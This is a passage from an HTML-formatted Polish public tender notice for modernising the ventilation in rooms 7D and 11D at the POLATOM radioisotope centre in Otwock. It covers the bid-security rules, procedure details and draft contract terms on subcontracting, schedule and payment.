miejsca wykonania i nazwy podmiotów, na rzecz których roboty te zostały wykonane. Do wykazu należy załączyć dowody potwierdzające, że te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym, że roboty zostały wykonane zgodnie z przepisami prawa budowlanego. Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie użyć tych dokumentów – inne dokumenty.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Uprawnienia budowlane (osoba kierująca robotami) – wymienione w Załączniku B Świadectwo kwalifikacyjne – wymienione w Załączniku B ( pkt.4)Świadectwo kwalifikacyjne – wymienione w Załączniku B ( pkt.5)</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Wykonawca zobowiązany jest wnieść wadium w wysokości 8 000,00 PLN (słownie: osiem tysiące złotych) przed upływem terminu składania ofert.2.	Wadium może być wniesione w:a)	pieniądzu;b)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;c)	gwarancjach bankowych;d)	w gwarancjach ubezpieczeniowych, e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2018 r. poz. 110).3.	Wadium w formie pieniądza należy wnieść przelewem na konto w:Raiffeisen Bank Polska nr rachunku: 09 1750 0009 0000 0000 0347 9226 z dopiskiem na przelewie: Wadium w postępowaniu przetargowym: Nr sprawy: 12/P/2020 „Modernizacja instalacji wentylacji w pomieszczeniach 7D i 11D”. Za skuteczne wniesienie wadium w pieniądzu uznaje się wpływ środków pieniężnych na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. 4.	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:a)	pieniężnej - dokument potwierdzający dokonanie przelewu wadium został załączony do oferty;b)	Wadium wnoszone w poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w Rozdziale VIII ust. 2 pkt 2.2 – 2.5 SIWZ, należy złożyć wraz z ofertą w postaci elektronicznego dokumentu podpisanego kwalifikowanym podpisem elektronicznym przez osobę upoważnioną do wystawienia dokumentu.5. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp, na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium, zgodnie z warunkami SIWZ, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela.6. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.7. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 ustawy Pzp. </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>NAJNIŻSZA CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Nr sprawy: 12/P/2020 Załącznik nr 5 do SIWZUMOWA Nr DZP/ ........ / 2020z dnia ................................................ 2020 r.zawarta po przeprowadzeniu procedury przetargu nieograniczonegoStrony umowy:1.Narodowe Centrum Badań Jądrowych Ośrodek Radioizotopów POLATOM05-400 Otwockul. Andrzeja Sołtana 7reprezentowany przez:DyrektoraMgr inż. Tomasza Dzielazwany dalej ZAMAWIAJĄCYM2.………………………………………………………………………………………………………………………………………………reprezentowany przez: ……………………………..zwany dalej WYKONAWCĄ§ 11.	Zamawiający zleca a Wykonawca przyjmuje do wykonania roboty, które stanowią przedmiot zamówienia publicznego pn.: „Modernizacja instalacji wentylacji w pomieszczeniach 7D i 11D”.Przedmiotem zamówienia jest wybudowanie wraz z uruchomieniem instalacji wentylacji mechanicznej dla pomieszczeń 11D i 7D w budynku 24ABCDW. Zadaniem instalacji będzie utrzymanie odpowiednich parametrów powietrza w pomieszczeniach (temperatura oraz wilgotność). Zakres prac będzie obejmował położenie kanałów wentylacyjnych wraz z armaturą i urządzeniami, wykonanie niezbędnych instalacji hydraulicznych i elektrycznych oraz prace remontowo budowlane tj. wykucia przejść, zamurowanie dziur, miejscowe i całościowe naprawy ścian, sufitów, podłóg wraz z gruntowaniem, malowaniem oraz demontaż istniejących urządzeń wentylacyjnych i sufitu podwieszanego wraz z montażem nowego sufitu w systemie farmaceutycznym. Zamówienie musi być realizowane zgodnie z wymogami określonymi w SIWZ wraz z załącznikami (w szczególności z załącznikiem A – opisującym przedmiot zamówienia), stanowiącymi integralną część niniejszej umowy złożoną Ofertą Wykonawcy, zasadami sztuki budowlanej oraz wiedzą i doświadczeniem.2. Wykonawca zobowiązuje się do wykonania przedmiotu niniejszej umowy z należytą starannością, zgodnie z obowiązującymi przepisami prawa, Polskimi Normami oraz do oddania przedmiotu niniejszej umowy Zamawiającemu w terminie w niej określonym.3. Wykonawca oświadcza, że posiada wszelkie wymagane przez przepisy prawa pozwolenia, uprawnienia i zezwolenia konieczne do wykonania przedmiotu niniejszej umowy. Oświadczenie to dotyczy również pracowników Wykonawcy, podwykonawców i dalszych podwykonawców zaangażowanych przez Wykonawcę w wykonanie przedmiotu niniejszej umowy.4. Wykonawca może zlecić podwykonawcom wykonanie całości lub części przedmiotu niniejszej umowy wyłącznie po zaakceptowaniu przez Zamawiającego umowy o podwykonawstwo – o ile Wykonawca przewidział to w ofercie podwykonawstwo.5. Przed przystąpieniem do realizacji przedmiotu zamówienia w części, którą Wykonawca zamierza powierzyć podwykonawcy, Zamawiający wymaga przedstawienia mu, nie później niż 14 dni kalendarzowych przed jej zawarciem, pisemnego projektu umowy z podwykonawcą (wskazanym w ofercie).W umowie tej należy zamieścić w szczególności wykaz osób (pracowników podwykonawcy wraz ze stosownymi uprawnieniami), które będą wykonywać prace przy realizacji zamówienia, określić terminy zapłaty wynagrodzenia, które nie mogą być dłuższe niż 30 dni, liczone od dnia doręczenia Wykonawcy przez podwykonawcę faktur lub rachunków.6. Umowa o podwykonawstwo nie może zawierać:a)	postanowień uzależniających uzyskanie przez podwykonawcę płatności od Wykonawcy od zapłaty przez Zamawiającego Wykonawcy wynagrodzenia obejmującego zakres robót wykonanych przez podwykonawcę,b)	postanowień uzależniających zwrot podwykonawcy kwot zabezpieczenia przez Wykonawcę, od zwrotu zabezpieczenia wykonania umowy przez Zamawiającego Wykonawcy.7. Zamawiający w ciągu 3 dni roboczych może zgłosić zastrzeżenia do przedstawionego projektu umowy o podwykonawstwo lub zaakceptować ją. Po akceptacji projektu umowy o podwykonawstwo Wykonawca przedłoży poświadczony za zgodność z oryginałem odpis umowy o podwykonawstwo w terminie 7 dni kalendarzowych od dnia zawarcia tej umowy. Jeżeli Zamawiający w terminie 3 dni roboczych od dnia przedłożenia umowy o podwykonawstwo, której przedmiotem są roboty budowlane, nie zgłosi w formie pisemnej sprzeciwu, uważa się, że zaakceptował tą umowę.8. Przystąpienie do realizacji robót przez podwykonawcę możliwe jest po akceptacji umowy o podwykonawstwo przez Zamawiającego. Przed rozpoczęciem robót podwykonawca jest zobowiązany poinformować o tym Zamawiającego i uzyskać od niego zgodę na przystąpienie do pracy.9.	Wykonawca jest zobowiązany do każdorazowego przedkładania Zamawiającemu w terminie 7 dni kalendarzowych od dnia zawarcia poświadczonych za zgodność z oryginałem odpisów zawartych umów o podwykonawstwo, których przedmiotem są dostawy lub usługi (przy robotach budowlanych), w celu weryfikacji, czy wskazane w nich terminy zapłaty wynagrodzenia nie są dłuższe niż 30 dni liczone od dnia doręczenia Wykonawcy faktur lub rachunków, z wyłączeniem umów o podwykonawstwo o wartości mniejszej niż 0,5% wartości umowy (wyłączenie nie dotyczy umów o podwykonawstwo o wartości większej niż 50 000,00 zł). Jeżeli termin zapłaty wynagrodzenia jest dłuższy niż 30 dni od dnia doręczenia Wykonawcy faktury lub rachunku, Zamawiający informuje o tym Wykonawcę i podwykonawcę i wzywa ich do zmiany tego terminu, w ciągu 7 dni kalendarzowych, pod rygorem wystąpienia o zapłatę kary umownej. Niedokonanie zmiany w określonym przez Zamawiającego terminie pozbawia podwykonawcę tej umowy o podwykonawstwo uprawnienia do wystąpienia do Zamawiającego o bezpośrednią zapłatę należnego wynagrodzenia. 10.	W przypadku zmiany podwykonawcy lub wprowadzenia podwykonawcy nie wskazanego w ofercie, Wykonawca jest zobowiązany do dostarczenia Zamawiającemu do akceptacji kopii umów (których przedmiotem są roboty budowlane, dostawy lub usługi) z podwykonawcami przed przystąpieniem podwykonawcy do realizacji tychże umów. Zasady i konsekwencje dotyczące dostarczania umów z podwykonawcami obowiązują jak w pkt. a).Wykonawca przedłoży, wraz z projektem umowy z podwykonawcą, odpis z Krajowego Rejestru Sądowego podwykonawcy lub inny dokument właściwy z uwagi na status prawny podwykonawcy, potwierdzający uprawnienia osób zawierających umowę w imieniu podwykonawcy do jego reprezentowania.11.	Podwykonawca ma prawo do wystąpienia do Zamawiającego o dokonanie zapłaty bezpośredniej kwoty wynagrodzenia za prace określone w umowie o podwykonawstwo. Zasadność zapłaty wymaga akceptacji Wykonawcy i Zamawiającego.12. W przypadku dokonywania bezpośredniej zapłaty przez Zamawiającego kwoty wynagrodzenia należnego podwykonawcom, kwota ta zostaje potrącona z wynagrodzenia Wykonawcy, a brak zapłaty lub nieterminowa zapłata dla podwykonawcy przez Wykonawcę stanowi przesłankę do nałożenia kary umownej dla Wykonawcy. Powtarzające się, nieuzasadnione wstrzymywanie zapłaty należności przez Wykonawcę, jak również konieczność dokonywania bezpośrednich zapłat na sumę większą niż 5% wartości umowy w sprawie zamówienia publicznego może być podstawą do odstąpienia od umowy przez Zamawiającego.13.	Bezpośrednia zapłata obejmuje wyłącznie należne wynagrodzenie, bez odsetek, należnych podwykonawcy. Zamawiający przed dokonaniem zapłaty umożliwia Wykonawcy zgłoszenie pisemnych uwag dotyczących zasadności bezpośredniej zapłaty wynagrodzenia podwykonawcy w terminie 7 dni kalendarzowych od doręczenia takiej informacji.14.	W przypadku zgłoszenia uwag przez Wykonawcę, Zamawiający może:	nie dokonać bezpośredniej zapłaty wynagrodzenia podwykonawcy, jeżeli Wykonawca wskaże niezasadność takiej zapłaty,albo	złożyć do depozytu sądowego kwotę potrzebną na pokrycie wynagrodzenia podwykonawcy w przypadku istnienia uzasadnionej wątpliwości Zamawiającego co do wysokości należnej zapłaty lub podmiotu, któremu płatność się należy,albo	dokonać bezpośredniej zapłaty wynagrodzenia podwykonawcy, jeżeli podwykonawca wykaże zasadność takiej zapłaty.15.	Zaakceptowane przez Zamawiającego umowy z podwykonawcami będą stanowiły załączniki do niniejszej umowy.16.	Pozostałe informacje dotyczące umów znajdują się w Dziale IV ustawy Pzp „Umowy w sprawie zamówień publicznych” art. 139-146.17.	Przedstawienie Zamawiającemu przez Wykonawcę umów z podwykonawcami po upływie terminu określonego w niniejszym pkt 5 daje Zamawiającemu prawo do odstąpienia od umowy o realizację zamówienia z winy Wykonawcy.Zasady dotyczące podwykonawców mają odpowiednie zastosowanie do dalszych podwykonawców.18.	Wykonawca ponosi pełną odpowiedzialność za wszelkie działania lub zaniechania własne, jak i podwykonawców.19. Wykonawca zobowiązuje się, że pracownicy wykazani w Załączniku nr 4 „Wykaz osób do realizacji zamówienia” będą w okresie realizacji niniejszej umowy zatrudnieni na podstawie umowy o pracę (minimum cztery osoby) w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2019 r. poz. 1040 z późn. zm.).20. Każdorazowo na żądanie Zamawiającego, w terminie wskazanym przez Zamawiającego nie krótszym niż 3 dni robocze, Wykonawca zobowiązuje się przedłożyć do wglądu zanonimizowane (niewidoczne dane osobowe pracowników) kopie umów o pracę zawartych przez Wykonawcę lub podwykonawcę z osobami (pracownicy fizyczni) biorącymi udział w realizacji zamówienia.21. Nieprzedłożenie przez Wykonawcę kopii umów pracowników fizycznych zatrudnionych przez wykonawcę/podwykonawcę zgodnie z ustępem powyżej będzie traktowane jako niewypełnienie obowiązku zatrudnienia pracowników biorących udział w realizacji zamówienia na podstawie umowy o pracę.22. Za niedopełnienie wymogu zatrudnienia pracowników biorących udział w realizacji zamówienia na podstawie umowy o pracę w rozumieniu przepisów Kodeksu pracy, Wykonawca zapłaci Zamawiającemu kary umowne w wysokości kwoty minimalnego miesięcznego wynagrodzenia za każdą osobę co do której nie dopełnił obowiązku zatrudnienia jej na umowę o pracę (za każdy miesiąc).§ 21. Wszelkie czynności, ustalenia i decyzje dotyczące wykonywania przedmiotu niniejszej umowy uzgadniane będą przez ustanowionego przedstawiciela Wykonawcy z upoważnionym przedstawicielem Zamawiającego:Kazimierz Korga, tel: 48 695645133Jacek Subda, tel: 48 571313869.......................................................................................................................................................(imię i nazwisko przedstawiciela Wykonawcy wraz z kontaktowym numerem telefonu………………………………………………………………………………………………….(imię i nazwisko przedstawiciela Wykonawcy wraz z kontaktowym numerem telefonu2. W/w przedstawiciele są upoważnieni do składania i przyjmowania w imieniu odpowiednio Zamawiającego i Wykonawcy wszystkich wymaganych oświadczeń woli związanych z realizacją przedmiotu umowy, do prowadzenia negocjacji, uzgadniania i podejmowania decyzji w zakresie realizacji przedmiotu umowy, z wyjątkiem oświadczeń, które powodują konieczność dokonania zmiany umowy i które rodzą skutki finansowe powodujące przekroczenie kwoty wynagrodzenia za realizację przedmiotu umowy oraz oświadczeń powodujących zmianę terminu zakończenia umowy.§ 3Obowiązki stron:Do obowiązków Zamawiającego należy:•	wprowadzenie i protokolarne przekazanie Wykonawcy terenu prac,•	odbiór przedmiotu niniejszej umowy,•	terminowa zapłata należnego wynagrodzenia Wykonawcy.Do obowiązków Wykonawcy należy:•	zorganizowanie, zagospodarowanie oraz należyte zabezpieczenie, zwłaszcza przed dostępem osób trzecich, miejsca realizacji niniejszej umowy wraz z zapleczem,•	wykonanie i terminowe przekazanie Zamawiającemu do użytkowania przedmiotu niniejszej umowy,•	przekazanie dokumentacji powykonawczej i protokołu odbioru końcowego.§ 41. Wykonawca oświadcza, że wykona i przekaże Zamawiającemu do użytkowania przedmiot niniejszej umowy w terminie nie dłuższym niż 80 dni kalendarzowych od daty podpisania umowy.2. Zmiana umownego terminu zakończenia przedmiotu niniejszej umowy jest możliwa na skutek działania siły wyższej, której zaistnienie lub skutki uniemożliwiają wykonanie umowy w terminie w niej wskazanym.3. Strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej Strony, a następnie do udokumentowania zaistnienia tego stanu. Po ustąpieniu przeszkód w realizacji niniejszej umowy, spowodowanych zaistnieniem siły wyższej, Strony ustalają nowy termin wykonania przedmiotu umowy. O ile stan siły wyższej trwa dłużej niż dwa miesiące, Strony mogą wspólnie zdecydować na piśmie o odstąpieniu od dalszej realizacji niniejszej umowy bez kar i odszkodowań z tego tytułu. Roszczenia powstałe przed zaistnieniem siły wyższej zostaną rozliczone pomiędzy Stronami na dzień zaistnienia siły wyższej.§ 51. Wynagrodzenie Wykonawcy z tytułu należytego wykonania przedmiotu zamówienia (ogółem), o którym mowa w § 1 niniejszej umowy, wynosi:Netto …………………. PLN(słownie: ………..……………………………………………………………………………...)podatek VAT (stawka) 23 %podatek VAT (kwota) …………….… PLNbrutto ………………… PLN(słownie: ……………………………………………………………………………………….)W/w wynagrodzenie ma charakter wynagrodzenia zryczałtowanego i Wykonawcy nie przysługuje z tytułu wykonania przedmiotu umowy jakiekolwiek dodatkowe wynagrodzenie.2. Płatności będą realizowane pod warunkiem przedstawienia przez Wykonawcę dowodów potwierdzających, że uregulował on swoje zobowiązania względem wszystkich podwykonawców i dalszych podwykonawców.3. Niezależnie od powyższego warunkiem wystawienia faktury VAT za wykonanie robót budowlanych, przez Wykonawcę i żądania zapłaty wynagrodzenia jest podpisanie przez Strony protokołu odbioru, o którym mowa w § 6 niniejszej umowy bez zastrzeżeń, tj. stwierdzającego wykonanie prac bez wad oraz usterek.4. Płatność będzie zrealizowana na podstawie prawidłowo wystawionej przez Wykonawcę faktury VAT w terminie 30 dni od daty wystawienia, z zastrzeżeniem, że doręczenie faktury nastąpi na co najmniej 23 dni przed tak określonym terminem płatności, a w przypadku niezachowania tego terminu, termin płatności przedłuża się automatycznie o czas opóźnienia dostarczenia faktury.5. Prawidłowo wystawiona faktura powinna zawierać co najmniej:•	zapis: „modernizacja instalacji wentylacji po przeprowadzeniu 